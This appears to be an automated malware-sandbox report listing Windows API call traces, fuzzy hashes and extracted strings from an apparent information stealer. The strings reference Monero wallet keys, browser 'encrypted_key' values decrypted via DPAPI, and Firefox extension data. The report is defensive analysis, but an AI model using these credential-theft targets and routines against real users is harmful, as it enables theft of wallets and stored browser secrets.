                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: 9d518e2a77065daff2c73f022551877dbf1e5aa851b05917d00f21a01b83ba42
                              • Instruction ID: c52419770d1f9f8f9c2d8f5380c7ea1b3d5d9efb616007aa99f9c6f8b29728cd
                              • Opcode Fuzzy Hash: 9d518e2a77065daff2c73f022551877dbf1e5aa851b05917d00f21a01b83ba42
                              • Instruction Fuzzy Hash: 4A4127B150079D5EDB258B24CD94FFB7BEC9F05308F1848E9E98A86282D3719A44DFA0
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 001D6663
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 001D6726
                              • ExitProcess.KERNEL32 ref: 001D6755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: 3a2dc46ea4de034623795cd3e13fcf3ee75a70a9e310438fd0a6209be461c4af
                              • Instruction ID: 56becbcbe0349c3f8e53dd0b736f0491d0f0dbe23b6be2fc08a24b066e3b2a03
                              • Opcode Fuzzy Hash: 3a2dc46ea4de034623795cd3e13fcf3ee75a70a9e310438fd0a6209be461c4af
                              • Instruction Fuzzy Hash: 05312FB1801218ABDB14EB50DD91FDE7778AF54300F80519AF20977291DF746B48CF5A
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,001E0E28,00000000,?), ref: 001D882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001D8836
                              • wsprintfA.USER32 ref: 001D8850
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: f4efc26e46c929e1a8958ef21b7f449abe5ebe9b06b835b6bc7899d17fd2a2cc
                              • Instruction ID: c5dc50422a25573887ff784cdb53f0e527ff25777a1ad9843462e4b32f33afa2
                              • Opcode Fuzzy Hash: f4efc26e46c929e1a8958ef21b7f449abe5ebe9b06b835b6bc7899d17fd2a2cc
                              • Instruction Fuzzy Hash: 762112B2A40308AFDB04DF94DD45FAEBBB8FB48711F104119F605B7280C7799911CBA5
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,001D951E,00000000), ref: 001D8D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001D8D62
                              • wsprintfW.USER32 ref: 001D8D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 6ee118ef627fd8d33aa4a02f19ed9d4cf0bc4348d6b439b433a2ade340de703f
                              • Instruction ID: c13457c5efcbb89115e05de464f4fe3640a04083dfb19cdf490072a8f501d2aa
                              • Opcode Fuzzy Hash: 6ee118ef627fd8d33aa4a02f19ed9d4cf0bc4348d6b439b433a2ade340de703f
                              • Instruction Fuzzy Hash: 70E0E675A50308BBD710EB94DD09E5D77B8EB44701F004164FD0997240DA719E549B56
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                                • Part of subcall function 001D8B60: GetSystemTime.KERNEL32(001E0E1A,014AA360,001E05AE,?,?,001C13F9,?,0000001A,001E0E1A,00000000,?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001D8B86
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001CA2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 001CA3FF
                              • lstrlen.KERNEL32(00000000), ref: 001CA6BC
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 001CA743
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 259b1c64a67e407d3d793614e657c8e221c73d3e58bffd371ab127388ed2d1e9
                              • Instruction ID: 186d37cb0c1835077ff7e1d78c9ddefd24c0eed69cdff051900fa2988497e9a9
                              • Opcode Fuzzy Hash: 259b1c64a67e407d3d793614e657c8e221c73d3e58bffd371ab127388ed2d1e9
                              • Instruction Fuzzy Hash: 3CE115728101589BCB05FBA4DDA2EEE733CAF34301F90816AF51772191EF306A49DB66
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                                • Part of subcall function 001D8B60: GetSystemTime.KERNEL32(001E0E1A,014AA360,001E05AE,?,?,001C13F9,?,0000001A,001E0E1A,00000000,?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001D8B86
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001CD481
                              • lstrlen.KERNEL32(00000000), ref: 001CD698
                              • lstrlen.KERNEL32(00000000), ref: 001CD6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 001CD72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: a4df5021301432186e0dfe2ba00fa3da503c8c88d3d3581b89f616024f0fd2ae
                              • Instruction ID: a0b8a9c972237b710213a3f332199564f1d2eea052f1debd676acfc8f1644d46
                              • Opcode Fuzzy Hash: a4df5021301432186e0dfe2ba00fa3da503c8c88d3d3581b89f616024f0fd2ae
                              • Instruction Fuzzy Hash: 659137728101589BCB04FBA4DD92EEE7338AF34301F90416AF50777291EF746A49DB66
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                                • Part of subcall function 001D8B60: GetSystemTime.KERNEL32(001E0E1A,014AA360,001E05AE,?,?,001C13F9,?,0000001A,001E0E1A,00000000,?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001D8B86
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001CD801
                              • lstrlen.KERNEL32(00000000), ref: 001CD99F
                              • lstrlen.KERNEL32(00000000), ref: 001CD9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 001CDA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: a4c92ca2db307cc0026c4ab93f3f66598d54f794e4b3421cee963da157002055
                              • Instruction ID: 40a0a76525c05511d1a3d783494369c071f9dc1b4606d06323be6419039e7a8c
                              • Opcode Fuzzy Hash: a4c92ca2db307cc0026c4ab93f3f66598d54f794e4b3421cee963da157002055
                              • Instruction Fuzzy Hash: 7B8126729101549BCB04FBA4DD96EEE7338AF34301F90452AF407B7291EF746A09DBA6
                              APIs
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                                • Part of subcall function 001C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001C99EC
                                • Part of subcall function 001C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 001C9A11
                                • Part of subcall function 001C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 001C9A31
                                • Part of subcall function 001C99C0: ReadFile.KERNEL32(000000FF,?,00000000,001C148F,00000000), ref: 001C9A5A
                                • Part of subcall function 001C99C0: LocalFree.KERNEL32(001C148F), ref: 001C9A90
                                • Part of subcall function 001C99C0: CloseHandle.KERNEL32(000000FF), ref: 001C9A9A
                                • Part of subcall function 001D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001D8E52
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,001E1580,001E0D92), ref: 001CF54C
                              • lstrlen.KERNEL32(00000000), ref: 001CF56B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              • Opcode ID: f209d61b540fe866096bc61181816b822377ff93632ff30e084753d76e9480be
                              • Instruction ID: 27be4091555c17d33ab18a40768bd0ac95e9a3e0449eb25e585e5413360264ee
                              • Opcode Fuzzy Hash: f209d61b540fe866096bc61181816b822377ff93632ff30e084753d76e9480be
                              • Instruction Fuzzy Hash: F7511771D10148ABDB04FBF4DC96DEE7379AF64300F808529F81667291EF346A09DBA6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: cac642f7b46e1abbe841bd6809110eeaf7d7016e40ba306bddda887424657319
                              • Instruction ID: 68555ba846fb6f7f40096c3a29d75efee2b2ff55c86af448abb99a8f33eae192
                              • Opcode Fuzzy Hash: cac642f7b46e1abbe841bd6809110eeaf7d7016e40ba306bddda887424657319
                              • Instruction Fuzzy Hash: E8415EB1D10209ABCB04EFE5DC95AEEB774AF58304F40801AE41677390EB75AA45CFA6
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001C99EC
                                • Part of subcall function 001C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 001C9A11
                                • Part of subcall function 001C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 001C9A31
                                • Part of subcall function 001C99C0: ReadFile.KERNEL32(000000FF,?,00000000,001C148F,00000000), ref: 001C9A5A
                                • Part of subcall function 001C99C0: LocalFree.KERNEL32(001C148F), ref: 001C9A90
                                • Part of subcall function 001C99C0: CloseHandle.KERNEL32(000000FF), ref: 001C9A9A
                                • Part of subcall function 001D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001D8E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 001C9D39
                                • Part of subcall function 001C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001C4EEE,00000000,00000000), ref: 001C9AEF
                                • Part of subcall function 001C9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,001C4EEE,00000000,?), ref: 001C9B01
                                • Part of subcall function 001C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001C4EEE,00000000,00000000), ref: 001C9B2A
                                • Part of subcall function 001C9AC0: LocalFree.KERNEL32(?,?,?,?,001C4EEE,00000000,?), ref: 001C9B3F
                                • Part of subcall function 001C9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 001C9B84
                                • Part of subcall function 001C9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 001C9BA3
                                • Part of subcall function 001C9B60: LocalFree.KERNEL32(?), ref: 001C9BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: 6c7b82edacc5229b39e627bed0d3bf498dc386a3cf8bd19d95c8dd6ff409370a
                              • Instruction ID: c8ca1c0dd15fb6b29c803d1cfc442054ca7034b35933b3b411e544c8eb8ced78
                              • Opcode Fuzzy Hash: 6c7b82edacc5229b39e627bed0d3bf498dc386a3cf8bd19d95c8dd6ff409370a
                              • Instruction Fuzzy Hash: 33311EB6D10209ABCB14DBE4DC89FEEB7B8AF68304F54451DE906B7241E735DA04CBA1
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001E05B7), ref: 001D86CA
                              • Process32First.KERNEL32(?,00000128), ref: 001D86DE
                              • Process32Next.KERNEL32(?,00000128), ref: 001D86F3
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                              • CloseHandle.KERNEL32(?), ref: 001D8761
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: 94b5717ac8924cc6aec3e945214cdb9fb50577396b3f0a2fb6650cf57d7a8e45
                              • Instruction ID: c6a55ee32343d2d3f4b868e4634a809381449f8ca4b492df2459d1a09cfcd9e4
                              • Opcode Fuzzy Hash: 94b5717ac8924cc6aec3e945214cdb9fb50577396b3f0a2fb6650cf57d7a8e45
                              • Instruction Fuzzy Hash: 27317C71901258ABCB24EF91CC51FEEB778EF55700F5081AAF50AA22A0DF306E45CFA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,001E0E00,00000000,?), ref: 001D79B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001D79B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,001E0E00,00000000,?), ref: 001D79C4
                              • wsprintfA.USER32 ref: 001D79F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 4566c0c5630167fd432b44f1eb58d29fa0f20bf0445cd0f7b1f2eb23497f76dd
                              • Instruction ID: 0ab9fea244ec4bee779cbfd7f8d3f6e165031601536dd32e1e8b216a63350e9a
                              • Opcode Fuzzy Hash: 4566c0c5630167fd432b44f1eb58d29fa0f20bf0445cd0f7b1f2eb23497f76dd
                              • Instruction Fuzzy Hash: 18112AB2904218ABCB14DFD9DE45BBEB7F8FB4CB11F10461AF645A2280E3395950C7B5
                              APIs
